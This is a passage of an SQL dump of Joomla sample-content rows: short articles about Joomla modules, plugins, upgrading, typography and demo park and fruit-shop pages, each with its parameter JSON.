00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,3,'','',1,3037,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(48,146,'The Joomla! Project','the-joomla-project','<p>The Joomla Project consists of all of the people who make and support the Joomla Web Platform and Content Management System.</p>\r\n<p>Our mission is to provide a flexible platform for digital publishing and collaboration.</p>\r\n<p>The core values are:</p>\r\n<ul>\r\n<li>Freedom</li>\r\n<li>Equality</li>\r\n<li>Trust</li>\r\n<li>Community</li>\r\n<li>Collaboration</li>\r\n<li>Usability</li>\r\n</ul>\r\n<p>In our vision, we see:</p>\r\n<ul>\r\n<li>People publishing and collaborating in their communities and around the world</li>\r\n<li>Software that is free, secure, and high-quality</li>\r\n<li>A community that is enjoyable and rewarding to participate in</li>\r\n<li>People around the world using their preferred languages</li>\r\n<li>A project that acts autonomously</li>\r\n<li>A project that is socially responsible</li>\r\n<li>A project dedicated to maintaining the trust of its users</li>\r\n</ul>\r\n<p>There are millions of users around the world and thousands of people who contribute to the Joomla Project. They work in three main groups: the Production Working Group, responsible for everything that goes into software and documentation; the Community Working Group, responsible for creating a nurturing the community; and Open Source Matters, the non profit organization responsible for managing legal, financial and organizational issues.</p>\r\n<p>Joomla is a free and open source project, which uses the GNU General Public License version 2 or later.</p>','',1,19,'2011-01-01 00:00:01',676,'','2011-12-27 11:47:48',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,1,'','',1,3555,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(49,147,'Typography','typography','<h1>H1 ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmonpqrstuvwzyz</h1><h2>H2 ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmonpqrstuvwzyz</h2><h3>H3 ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmonpqrstuvwzyz</h3><h4>H4 ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmonpqrstuvwzyz</h4><h5>H5 ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmonpqrstuvwzyz</h5><h6>H6 ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmonpqrstuvwzyz</h6><p>P The quick brown fox ran over the lazy dog. THE QUICK BROWN FOX RAN OVER THE LAZY DOG.</p><ul><li>Item</li><li>Item</li><li>Item<br /> <ul><li>Item</li><li>Item</li><li>Item<br /> <ul><li>Item</li><li>Item</li><li>Item</li></ul></li></ul></li></ul><ol><li>tem</li><li>Item</li><li>Item<br /> <ol><li>Item</li><li>Item</li><li>Item<br /><ol><li>Item</li><li>Item</li><li>Item</li></ol></li></ol> </li></ol>','',1,23,'2011-01-01 00:00:01',676,'Joomla!','2011-01-01 00:00:01',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',1,1,'','',1,7669,'',0,'*','',''),(50,148,'Upgraders','upgraders','<p>If you are an experienced Joomla! 1.5 user, this Joomla site will seem very familiar. There are new templates and improved user interfaces, but most functionality is the same. The biggest changes are improved access control (ACL) and nested categories. This release of Joomla has strong continuity with Joomla! 1.7 while adding enhancements.</p>\r\n','\r\n<p>The new user manager will let you manage who has access to what in your site. You can leave access groups exactly the way you had them in Joomla 1.5 or make them as complicated as you want. You can learn more about<a href=\"http://docs.joomla.org/ACL_Tutorial_for_Joomla_1.6\"> how access control works</a> in on the <a href=\"http://docs.joomla.org\">Joomla! Documentation site</a></p>\r\n<p>In Joomla 1.5 and 1.0 content was organized into sections and categories. From 1.6 forward sections are gone, and you can create categories within categories, going as deep as you want. The sample data provides many examples of the use of nested categories.</p>\r\n<p>All layouts have been redesigned to improve accessibility and flexibility. </p>\r\n<p>Updating your site and extensions when needed is easier than ever thanks to installer improvements.</p>\r\n<p> </p>',1,19,'2011-01-01 00:00:01',676,'','2012-01-17 04:28:10',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,6,'','',1,4529,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(51,149,'User','user-plugins','<p>Default on:</p>\r\n<ul>\r\n<li>Joomla <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#User_-_Joomla.21\">Help</a></li>\r\n</ul>\r\n<p>Default off:</p>\r\n<p>Two new plugins are available but are disabled by default.</p>\r\n<ul>\r\n<li>Contact Creator <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#User_-_Contact_Creator\">Help</a><br />Creates a new linked contact record for each new user created.</li>\r\n<li>Profile <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#User_-_Profile\">Help</a><br />This example profile plugin allows you to insert additional fields into user registration and profile display. This is intended as an example of the types of extensions to the profile you might want to create.</li>\r\n</ul>','',1,25,'2011-01-01 00:00:01',676,'Joomla!','2011-12-27 11:51:25',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,4,'','',1,2301,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(52,150,'Users','users-component','<p>The users extension lets your site visitors register, login and logout, change their passwords and other information, and recover lost passwords. In the administrator it allows you to create, block and manage users and create user groups and access levels. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Users_User_Manager\">Help</a></p>\r\n<p>Please note that some of the user views will not display if you are not logged-in to the site.</p>','',1,21,'2011-01-01 00:00:01',676,'Joomla!','2011-01-10 04:52:55',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',2,5,'','',1,2824,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(53,151,'Using Joomla!','using-joomla','<p>With Joomla you can create anything from a simple personal website to a complex ecommerce or social site with millions of visitors.</p>\r\n<p>This section of the sample data provides you with a brief introduction to Joomla concepts and reference material to help you understand how Joomla works.</p>\r\n<p><em>When you no longer need the sample data, you can can simply unpublish the sample data category found within each extension in the site administrator or you may completely delete each item and all of the categories. </em></p>','',1,19,'2011-01-01 00:00:01',676,'Joomla!','2011-12-27 11:52:45',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,7,'','',1,3897,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(54,152,'Weblinks','weblinks','<p>Weblinks (com_weblinks) is a component that provides a structured way to organize external links and present them in a visually attractive, consistent and informative way. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Components_Weblinks_Links\">Help</a></p>','',1,21,'2011-01-01 00:00:01',676,'Joomla!','2011-01-10 04:20:10',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',2,6,'','',1,2787,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(55,153,'Weblinks Module','weblinks-module','<p>This module displays the list of weblinks in a category. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Weblinks\" title=\"Weblinks Module\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule weblinks,Weblinks}</div>','',1,66,'2011-01-01 00:00:01',676,'Joomla!','2011-09-17 22:32:10',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',7,5,'','',1,2435,'',0,'*','',''),(56,154,'Who\'s Online','whos-online','<p>The Who\'s Online Module displays the number of Anonymous Users (e.g. Guests) and Registered Users (ones logged-in) that are currently accessing the Web site. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Who_Online\" title=\"Who\'s Online\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule whosonline,Who\'s Online}</div>','',1,65,'2011-01-01 00:00:01',676,'Joomla!','2011-09-17 22:19:45',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',4,1,'','',1,3493,'',0,'*','',''),(57,155,'Wobbegone','wobbegone','<p> </p>\r\n','\r\n<p> </p>',1,72,'2011-01-01 00:00:01',676,'Parks Webmaster','2012-01-17 05:01:59',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"images\\/sampledata\\/parks\\/animals\\/180px_wobbegong.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"Wobbegon\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/sampledata\\/parks\\/animals\\/800px_wobbegong.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"Wobbegon\",\"image_fulltext_caption\":\"Source: http:\\/\\/en.wikipedia.org\\/wiki\\/File:Wobbegong.jpg Author: Richard Ling Rights: GNU Free Documentation License v 1.2 or later\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,1,'','',1,801,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(58,156,'Wonderful Watermelon','wonderful-watermelon','<p>Watermelon is a wonderful and healthy treat. We grow the world\'s sweetest watermelon. We have the largest watermelon patch in our country.</p>','',1,30,'2011-01-01 00:00:01',676,'Fruit Shop Webmaster','2011-01-01 00:00:01',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',1,1,'','',1,2689,'',0,'*','',''),(59,157,'Wrapper Module','wrapper-module','<p>This module shows an iFrame window to specified location. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Wrapper\" title=\"Wrapper Module\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule wrapper,Wrapper}</div>','',1,67,'2011-01-01 00:00:01',676,'Joomla!','2011-09-17 22:35:00',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',8,1,'','',1,2268,'',0,'*','',''),(60,158,'News Feeds','news-feeds','<p>News Feeds (com_newsfeeds) provides a way to organize and present news feeds. News feeds are a way that you present information from another site on your site. For example, the joomla.org website has numerous feeds that you can incorporate on your site. You an use menus to present a single feed, a list of feeds in a category, or a list of all feed categories. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Components_Newsfeeds_Feeds\">Help</a></p>','',1,21,'2011-01-01 00:00:01',676,'Joomla!','2011-12-27 11:27:31',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,4,'','',1,2662,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(61,159,'Breadcrumbs Module','breadcrumbs-module','<p>Breadcrumbs provide a pathway for users to navigate through the site. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Breadcrumbs\" title=\"Breacrumbs Module\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule breadcrumbs,breadcrumbs}</div>','',1,75,'2011-01-01 00:00:01',676,'Joomla!','2011-09-17 22:10:19',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',5,2,'','',1,3484,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(62,160,'Content','content-plugins','<p>Content plugins run when specific kinds of pages are loaded. They do things ranging from protecting email addresses from harvesters to creating page breaks.</p>\r\n<p>Default on:</p>\r\n<ul>\r\n<li>Email Cloaking <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Content_-_Email_Cloaking\">Help</a></li>\r\n<li>Load Module <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Content_-_Load_Modules\">Help</a></li>\r\n<li>Page Break <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Content_-_Pagebreak\">Help</a></li>\r\n<li>Page Navigation<a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Content_-_Page_Navigation\"> Help</a></li>\r\n<li>Vote <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Content_-_Vote\">Help</a></li>\r\n</ul>\r\n<p>Default off:</p>\r\n<ul>\r\n<li>Code Highlighter (GeSHi) <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Content_-_Code_Highlighter_.28GeSHi.29\">Help</a></li>\r\n</ul>','',1,25,'2011-01-01 00:00:01',676,'Joomla!','2011-09-06 06:11:50',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',2,7,'','',1,7,'',0,'*','',''),(64,162,'Blue Mountain Rain Forest','blue-mountain-rain-forest','<p> </p>\r\n','\r\n<p> </p>',0,73,'2011-01-01 00:00:01',676,'Parks Webmaster','2012-01-17 04:36:30',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"images\\/sampledata\\/parks\\/landscape\\/120px_rainforest_bluemountainsnsw.jpg\",\"float_intro\":\"none\",\"image_intro_alt\":\"Rain Forest Blue Mountains\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/sampledata\\/parks\\/landscape\\/727px_rainforest_bluemountainsnsw.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"Rain Forest Blue Mountains\",\"image_fulltext_caption\":\"Source: http:\\/\\/commons.wikimedia.org\\/wiki\\/File:Rainforest,bluemountainsNSW.jpg Author: Adam J.W.C. License: GNU Free Documentation License\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,2,'','',1,1769,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(65,163,'Ormiston Pound','ormiston-pound','<p> </p>\r\n','\r\n<p> </p>',0,73,'2011-01-01 00:00:01',676,'Parks Webmaster','2012-01-17 04:51:33',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"images\\/sampledata\\/parks\\/landscape\\/180px_ormiston_pound.jpg\",\"float_intro\":\"none\",\"image_intro_alt\":\"Ormiston Pound\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/sampledata\\/parks\\/landscape\\/800px_ormiston_pound.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"Ormiston Pound\",\"image_fulltext_caption\":\"Source: http:\\/\\/commons.wikimedia.org\\/wiki\\/File:Ormiston_Pound.JPG Author: License: GNU Free Public Documentation License\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,3,'','',1,1110,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(66,165,'Latest Users Module','latest-users-module','<p>This module displays the latest registered users. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Latest_Users\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule users_latest,Users Latest}</div>','',1,65,'2011-01-01 00:00:01',676,'Joomla!','2011-09-17 22:21:05',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"1\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"1\",\"link_category\":\"1\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',4,3,'','',1,2313,'',0,'*','',''),(67,168,'What\'s New in 1.5?','whats-new-in-15','<p>This article deliberately archived as an example.</p><p>As with previous releases, Joomla! provides a unified and easy-to-use framework for delivering content for Web sites of all kinds. To support the changing nature of the 